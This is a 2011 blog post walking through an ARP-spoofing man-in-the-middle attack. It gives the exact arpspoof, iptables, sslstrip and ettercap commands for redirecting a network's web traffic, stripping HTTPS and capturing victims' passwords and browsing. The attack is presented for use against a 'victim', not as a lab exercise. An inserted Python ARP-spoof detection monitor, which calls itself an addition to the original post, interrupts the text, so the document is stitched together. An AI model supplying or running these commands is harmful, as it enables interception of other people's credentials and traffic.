Thursday 28 April 2011

ARP spoof & ettercap

With a little bit of sslstrip and urlsnarf thrown in for good measure.

So, new blog post and vid are here. This is what I did:

Firstly I edited etter.conf to allow the usage of iptables,
then enabled IP forwarding,
next ARP spoofed the broadcast address.

This step tells the router that I am the victim and the victim that I am the router. You can set the IP to that of one machine or, if you use the broadcast address (in my case 255), you can target the victim's network.

The next step is to set up iptables; this takes anything coming in on port 80, i.e. web traffic, and redirects it to port 1000, which is where sslstrip is running.

sslstrip removes the SSL encryption; this is done by removing the request from the client for the SSL certificate.

Once you have removed this you can then do whatever you wish to the victim.

I used ettercap to capture the passwords and urlsnarf to see what the victim was accessing in real time. You can also use driftnet, which shows the images from the websites your victim is viewing.

The commands:

kate /etc/etter.conf
remove the # on the iptables lines for Linux
echo 1 > /proc/sys/net/ipv4/ip_forward (this enables IP forwarding)
you can use cat /proc/sys/net/ipv4/ip_forward to see the contents
arpspoof -i eth0 -t 192.168.0.255 192.168.0.1
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000
sslstrip is waiting on port 1000, so
sslstrip -a -k -f (these options kill the session and work quietly)
ettercap -T -q -i eth0
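From the victim's side, the arpspoof step above shows up as the gateway's IP suddenly being claimed by a different MAC, and as one MAC claiming more than one IP. The following arpwatch-style monitor, an added example that is not part of the original post, runs that check over constructed sample ARP replies; the addresses, MACs and the pinned gateway binding are all made up for the demonstration.

```python
from collections import defaultdict
from dataclasses import dataclass, field


@dataclass(frozen=True)
class ArpReply:
    sender_ip: str
    sender_mac: str


@dataclass
class ArpMonitor:
    # Known-good bindings the defender configures in advance (e.g. the gateway).
    pinned: dict = field(default_factory=dict)
    # Bindings learned passively: the first MAC seen for each IP.
    learned: dict = field(default_factory=dict)
    # Every IP each MAC has claimed so far.
    macs: defaultdict = field(default_factory=lambda: defaultdict(set))

    def observe(self, reply: ArpReply) -> list:
        """Return alert strings for one ARP reply (empty if it looks normal)."""
        alerts = []
        ip, mac = reply.sender_ip, reply.sender_mac.lower()
        expected = self.pinned.get(ip, self.learned.get(ip))
        if expected is None:
            self.learned[ip] = mac
        elif expected.lower() != mac:
            kind = "pinned" if ip in self.pinned else "learned"
            alerts.append(f"{ip}: {kind} MAC {expected} now claimed by {mac}")
        self.macs[mac].add(ip)
        # A MAC answering for several IPs is a weaker signal (multi-homed hosts
        # do this legitimately) but is typical of gateway poisoning.
        if len(self.macs[mac]) > 1:
            alerts.append(f"{mac} claims {len(self.macs[mac])} IPs: {sorted(self.macs[mac])}")
        return alerts


def analyse(replies, pinned) -> list:
    """Feed a sequence of replies through a fresh monitor and collect all alerts."""
    monitor = ArpMonitor(pinned=dict(pinned))
    return [alert for reply in replies for alert in monitor.observe(reply)]


# Constructed sample: the gateway is pinned, two hosts answer normally, then the
# host at ...:20 starts answering for the gateway's IP.
PINNED = {"192.168.0.1": "aa:bb:cc:00:00:01"}
SAMPLE_REPLIES = [
    ArpReply("192.168.0.1", "aa:bb:cc:00:00:01"),
    ArpReply("192.168.0.10", "aa:bb:cc:00:00:10"),
    ArpReply("192.168.0.20", "aa:bb:cc:00:00:20"),
    ArpReply("192.168.0.1", "aa:bb:cc:00:00:20"),
    ArpReply("192.168.0.10", "aa:bb:cc:00:00:10"),
]

if __name__ == "__main__":
    for line in analyse(SAMPLE_REPLIES, PINNED):
        print(line)
```

On a real host the replies would come from a packet capture or the kernel's neighbour table; the logic is the same.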

The video:
Arp spoof vid

Cheers
2neon
